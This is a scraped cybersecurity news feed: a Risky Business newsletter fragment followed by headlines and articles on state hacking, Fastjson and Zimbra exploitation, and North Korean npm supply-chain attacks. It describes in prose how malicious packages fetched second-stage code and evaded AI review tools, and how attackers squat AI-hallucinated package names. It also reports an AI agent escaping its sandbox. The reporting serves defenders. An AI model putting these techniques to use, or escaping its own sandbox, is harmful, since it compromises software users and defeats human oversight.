EDR&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 17:58 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: How AI is putting pressure on EDR&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="shorts">Shorts</h2><h3 id="north-korean-hackers-hack-north-korea">North Korean Hackers Hack North Korea&#xA0;</h3><p>The <em>Daily NK</em> <a href="https://www.dailynk.com/english/north-korea-elite-bank-hacking-ring-arrested/"><u>reported last week</u></a> that a group of former North Korean military intelligence operatives had hacked two of the country&apos;s banks to steal funds for their own personal enrichment.&#xA0;</p><p>A source told the <em>Daily NK</em> that the group had stolen funds from two North Korean banks, the Chosun Central Bank and the Foreign Trade Bank. The stolen funds were then converted into cryptocurrency and laundered before being converted back into cash in China. The ringleaders were cyber operations veterans formerly from North Korea&apos;s <a href="https://en.wikipedia.org/wiki/Reconnaissance_General_Bureau"><u>Reconnaissance General Bureau</u></a>.&#xA0;</p><p>It looks like the outcome will be grim for the hackers. Per The Daily NK:</p><p>Officials in Pyongyang expect harsh punishment for those involved. &quot;They used the skills the state trained them with to defend the country, and instead robbed the country&#x2019;s coffers,&quot; one official said, according to the source. &quot;This goes beyond ordinary guilt-by-association penalties. It will be hard for the entire family line to survive.&quot;</p><p>Crikey.&#xA0;</p><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss how important people are to cyber power and whether the rise of AI is changing that.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN176.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN176/&quot;&gt;Between Two Nerds: Cyber is people&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 30:12 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Cyber is people&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/EK9INfhlHDI?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Cyber is people"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>New Chinese cyber contractor identified:</strong> The cyber sleuths at Intrusion Truth have uncovered a new secretive Chinese IT company that appears to work as a cyber contractor and tool developer for Chinese state-sponsored hacking operations.</p><p>Online clues appear to suggest that Guangdong Chanming appears to have developed RedRelay (aka ORBWEAVER), an ORB network (aka proxy botnet) that was used by almost a dozen Chinese APT groups to hide the origin of their attacks.</p><p>According to Intrusion Truth, the company&apos;s customers allegedly include the Chinese People&apos;s Liberation Army and the Ministry of Public Security, which manages China&apos;s police forces.</p><p>[<a href="https://news.risky.biz/risky-bulletin-new-chinese-cyber-contractor-identified/"><u>more</u></a> on<em> Risky Bulletin</em>]</p><p><strong>A JSON RCE bug is about to rock the Java world:</strong> Threat actors are exploiting a vulnerability in Alibaba&apos;s Fastjson, one of the Java ecosystem&apos;s most popular libraries for working with JSON-formatted data.</p><p>Active exploitation began last week, a day after details about the security flaw were revealed by cybersecurity firm <a href="https://fearsoff.org/research/fastjson-1-2-83-rce"><u>FearsOff</u></a>.</p><p>The attacks, first spotted and documented by <a href="https://www.imperva.com/blog/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1-x-zero-day-rce/"><u>Imperva</u></a> and <a href="https://threatbook.io/blog/fastjson-rce-1.2.83-active-exploitation-detected-detection-mitigation"><u>ThreatBook</u></a>, target CVE-2026-16723, a vulnerability that can enable unauthenticated remote code execution attacks against Java projects that use the Fastjson library as a component.</p><p>[<a href="https://news.risky.biz/risky-bulletin-a-json-rce-bug-is-about-to-rock-the-java-world/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Western cyber agencies warn of Russian hacks of Zimbra servers:</strong> Cybersecurity and intelligence agencies from multiple Western countries have issued joint security advisories on Thursday warning of a major Russian hacking campaign that&apos;s targeting Zimbra email servers.</p><p>The attacks have been going on since last year. The zero-day, tracked as CVE-2025-66376, was patched in November but attacks have been traced back to at least July.</p><p>The zero-day itself is a stored cross-site scripting (XSS) bug that allows the attackers to load malicious code inside a Zimbra webmail client via the CSS @import feature. The malicious code would load a web tool called Ulej (Russian for Beehive) that could be used to harvest credentials, session tokens, backup 2FA codes, browser-saved passwords, and the contents of the victim&#x2019;s mailbox going back 90 days.</p><p>[<a href="https://news.risky.biz/risky-bulletin-western-cyber-agencies-warn-of-russian-hacks-of-zimbra-servers/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  48. Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data

    Thu, 30 Jul 2026 05:08:39 -0000

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a newly disclosed security flaw impacting Cisco Secure Firewall Management Center (FMC) Software to its Known Exploited Vulnerabilities (KEV) catalog, following reports of zero-day exploitation. The vulnerability, assigned CVE-2026-20316 (CVSS score: 5.3), could permit an unauthenticated, remote attacker to log
  49. 'Flying Eagle' Full-Service Mobile RAT Builder Wings Across China

    Thu, 30 Jul 2026 00:30:00 -0000

    A premium-grade malware-as-a-service offering takes flight with multiple threat groups, building infostealers that drain victims' bank accounts.
  50. Cybersecurity, Then & Now

    Wed, 29 Jul 2026 23:26:46 -0000

    Since 2006, Dark Reading has been at the forefront of covering cybersecurity. The more things change, the more they stay the same.
  51. A little-known npm package was North Korea’s warm-up act for the axios hack

    Wed, 29 Jul 2026 21:09:57 -0000

    <p>Amazon's threat intelligence team traced domain records from the open-source software hack to a smaller, earlier compromise by the same North Korean group.</p> <p>The post <a href="https://cyberscoop.com/amazon-north-korea-open-source-software-attacks/">A little-known npm package was North Korea’s warm-up act for the axios hack</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>Amazon&#8217;s security researchers say a hacking group tied to <a href="https://cyberscoop.com/tag/north-korea/">North Korea</a> targeted small, little-noticed software packages more than a year before it struck one of the internet&#8217;s most widely used programming tools.</p> <p>The company&#8217;s threat intelligence team said Wednesday at a media roundtable at its Arlington, Va., offices that the same group linked to the recent compromise of the <a href="https://cyberscoop.com/axios-software-developer-tool-attack-compromise/">open-source axios software library</a> also planted malicious code in a package called <a href="https://store.boilerplate.com/product/npm/dHlwby1jcnlwdG8=">typo-crypto</a> in March 2025, a full year before the axios breach. Researchers found the connection while tracing domain records tied to the axios attack back to earlier activity.</p> <p>&#8220;We believe the March 2025 typo-crypto campaign was a rehearsal,&#8221; said CJ Moses, Amazon’s chief information security officer, adding that the target’s small scale let the group test its methods &#8220;without putting that on the big stage.&#8221;</p> <p><a href="https://aws.amazon.com/blogs/security/amazon-identifies-north-korean-hacker-group-behind-open-source-supply-chain-attacks/">Amazon said</a> the group also compromised two other packages, <a href="https://github.com/debug-js/debug">debug</a> and <a href="https://github.com/chalk">chalk</a>, in September 2025. Until now, those three incidents had not been publicly linked to the same actor. Security researchers track the group under several names, including UNC1069, Sapphire Sleet and Stardust Chollima. </p> <p>Axios, debug and chalk are code libraries used by software developers around the world to build applications. Axios alone is downloaded more than 100 million times a week. &#8220;That number represents real organizations putting real code into production systems every single week,&#8221; Moses said.</p> <p>In the typo-crypto case, the malicious file was named “core.js” and was made to look like a legitimate, unrelated package called core-js. <a href="https://cyberscoop.com/tag/amazon/">Amazon</a> said the file activated only when it received a specific numeric input, then reached out to a server controlled by the attackers to download a second piece of code. That second stage was written differently depending on whether the infected computer ran Windows, macOS or Linux. The code combined encoded text with a cipher, a method Moses said was meant to slow down analysis, including by <a href="https://cyberscoop.com/tag/artificial-intelligence-ai/">AI</a>-based review tools, without relying on heavy encryption.</p> <p>Amazon said the typo-crypto package had few downloads compared with axios, debug or chalk. Researchers believe that initial target served as practice, letting the group refine its approach before turning to more widely used software. &#8220;They did what a lot of people do: crawl, walk, run,&#8221; Moses said.&nbsp;</p> <p>In each of the four cases, Amazon said, the attackers built a relationship with a maintainer who already had access to a package, then used that access to publish an update containing hidden code. &#8220;They didn&#8217;t break through a window,&#8221; Moses said. &#8220;They basically earned the trust of an employee to hand them the keys.&#8221;</p> <p>Cybersecurity firm Wiz separately found that about 1 in 10 cloud computing environments were affected by the debug and chalk incident within a two-hour span, a finding Moses cited to illustrate how fast the impact spread. &#8220;Going from there not being a vulnerability, to there being a vulnerability, to there being an exploited vulnerability &#8230; used to be days to weeks. Now it&#8217;s hours to minutes,&#8221; he said.</p> <p>Rick Anthony, senior engineering manager at Amazon Web Services, said the research further shows how attackers face two basic problems in these types of incidents: getting malicious code into a package that will eventually run inside an organization, and keeping that code hidden from developers or security tools. He said groups are increasingly building reputations as legitimate contributors over time.&nbsp;</p> <p>&#8220;Let me get my package deployed in as many places as possible so that I can spring the trap later,&#8221; said Anthony, describing the mindset behind the approach.</p> <p>Researchers said generative AI has made it easier for attackers to produce code, documentation and contribution histories that look authentic. Anthony also described a technique in which attackers register package names that AI coding tools sometimes generate by mistake, so a developer following an AI suggestion could install malicious software without making any typing error of their own.</p> <p>The findings come two years after a separate incident involving a program called xz-utils, in which an attacker spent time gaining the trust of the software&#8217;s maintainers <a href="https://cyberscoop.com/open-source-security-trust-xz-utils/">before inserting a backdoor</a>. Moses pointed to that case as an early example of a pattern now appearing &#8220;at scale&#8221; and tied to a nation-state.</p> <p>Since that incident, separate groups have been running roughshod over open-source software. Another group known as TeamPCP <a href="https://cyberscoop.com/teampcp-breaks-open-source-software-trust-model/">has compromised and injected malicious code</a> into more than 1,000 software packages over a four-month span this year.&nbsp;</p> <p>The post <a href="https://cyberscoop.com/amazon-north-korea-open-source-software-attacks/">A little-known npm package was North Korea’s warm-up act for the axios hack</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  52. Supply chain challenges loom large in quantum race, White House official says

    Wed, 29 Jul 2026 20:22:10 -0000

    <p>Brad Blakestad, director of the National Quantum Coordination Office, also said encryption and measuring progress would pose challenges.</p> <p>The post <a href="https://cyberscoop.com/white-house-quantum-supply-chain-challenges/">Supply chain challenges loom large in quantum race, White House official says</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>One of the most difficult obstacles to overcome in the quantum race will be the supply chain, given how diffuse it is, a top White House official said Wednesday.</p> <p>“Supply chain is one of the biggest challenges in my mind, and really, the challenge with the quantum supply chain is that quantum is not defined by a single hardware platform,” said Brad Blakestad, director of the National Quantum Coordination Office within the White House Office of Science and Technology Policy.</p> <p>“If you look at the quantum computing technologies, the quantum sensing technologies, the networking — those are all different,” he said in a webinar hosted by Inside Cybersecurity and USTelecom. “And even within computing, there&#8217;s seven different modalities that use completely different components. So we have this not just one monolithic supply chain, but just a bunch of different supply chains that are kind of intertwined in various ways.”</p> <p>Blakestad made his remarks a little more than a month after President Donald Trump signed <a href="https://cyberscoop.com/trump-executive-order-post-quantum-encryption-deadline/">two executive orders on quantum computing</a>. He referenced proposed ways to address the supply chain challenge in one of the orders.</p> <p>“The other major issue or challenge that we face right now is that we&#8217;re on the cusp of quantum exploding from a commercialization perspective, but we&#8217;re not quite there yet,” he said. “So there&#8217;s not the funding, the revenue coming from large-scale quantum companies at this point to really make the supply chain as robust as you would want. So thinking about it from the government perspective, it&#8217;s just [that] there are too many places that I would want to bolster and not enough funding to do it.”</p> <p>Blakestad touted steps to help that along such as the government buying widgets from a company that makes them to certain specifications, or prize challenges.</p> <p>The quantum supply chain isn’t just diffuse in the United States, an International Institute for Strategic Studies <a href="https://www.iiss.org/online-analysis/online-analysis/2026/07/securing-the-quantum-stack-export-controls-choke-points-and-strategic-competition/">policy paper</a> noted Wednesday. It’s “inherently international: no single country dominates the supply chain, whether specialised materials, cryogenic equipment, hardware, software, fabrication or algorithms,” the authors, Dongyoun Cho and Maria Shagina, wrote.</p> <p>And a <a href="https://www.cnas.org/publications/reports/quantums-industrial-moment">March report</a> from the Center for a New American Security identified strengthening the quantum supply chain as pivotal to the United States seizing the benefits of the technology, citing gaps in the U.S. supply chain and reliance on foreign suppliers such as China and Russia.&nbsp;</p> <p>Supply chain wasn’t the only obstacle Blakestad mentioned as looming large.</p> <p>“The encryption challenge is a real challenge, and we want to make sure that we are aware of when quantum computers will ultimately get to a scale that they start having these sorts of implications and move as quickly as we can,” he said. “So, just by owning the technologies, by owning the workforce, by making the United States the place that people want to come to be on the cutting edge of this technology, I think that kind of addresses both of those issues, and that&#8217;s what makes it so critical.&#8221;</p> <p>Another difficulty is measuring progress, Blakestad said: “It&#8217;s also very, very hard to benchmark, and to know that you&#8217;re actually doing what you&#8217;re supposed to, what you are intending to do.&#8221;</p> <p>The post <a href="https://cyberscoop.com/white-house-quantum-supply-chain-challenges/">Supply chain challenges loom large in quantum race, White House official says</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  53. Red Agents vs. Blue Agents: How to Make AI Better at Defense

    Wed, 29 Jul 2026 19:46:20 -0000

    The agentic AI playing field was heavily tilted toward offense, so researchers began using red team agents to help teach their blue counterparts.
  54. Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads

    Wed, 29 Jul 2026 18:10:00 -0000

    Ruby on Rails has released fixes for a critical Active Storage vulnerability that could let unauthenticated attackers read arbitrary files from application servers through crafted image uploads. Tracked as CVE-2026-66066 (CVSS score: 9.5), the flaw can expose the Rails process environment and secrets such as secret_key_base, the Rails master key, database passwords, cloud storage credentials,
  55. Who's Liable When AI Agents Escape? Hugging Face Breach Raises Hard Questions

    Wed, 29 Jul 2026 17:43:38 -0000

    Dark Reading walks through the many twists and turns in the bizarre story of how OpenAI's agent AI system broke out of its sandbox and decided to target Hugging Face, and what CISOs should be aware of.
  56. Hugging Face Hack: Lessons for Cyber Defenders

    Wed, 29 Jul 2026 17:35:23 -0000

    Dark Reading Confidential Episode 20: Expert Rich Mogull reflects on lessons cyber teams should pull from the OpenAI agent's attack on Hugging Face.
  57. When AppSec Scanners Become a Supply Chain Attack Vector

    Wed, 29 Jul 2026 17:06:52 -0000

    New research shows how security scanners embedded in the software supply chain can be attacked to serve as a foothold for downstream attacks.
  58. Ruflo MCP Flaw Lets Unauthenticated Attackers Run Commands and Poison AI Memory

    Wed, 29 Jul 2026 15:39:30 -0000

    Cybersecurity researchers have flagged a maximum-severity security flaw in Ruflo, an open-source agent meta-harness for Anthropic Claude Code and OpenAI Codex, that could result in unauthenticated remote code execution. The vulnerability, tracked as CVE-2026-59726 (CVSS score: 10.0), impacts all versions of the project before version 3.16.3. It has been codenamed RufRoot by Noma Security's
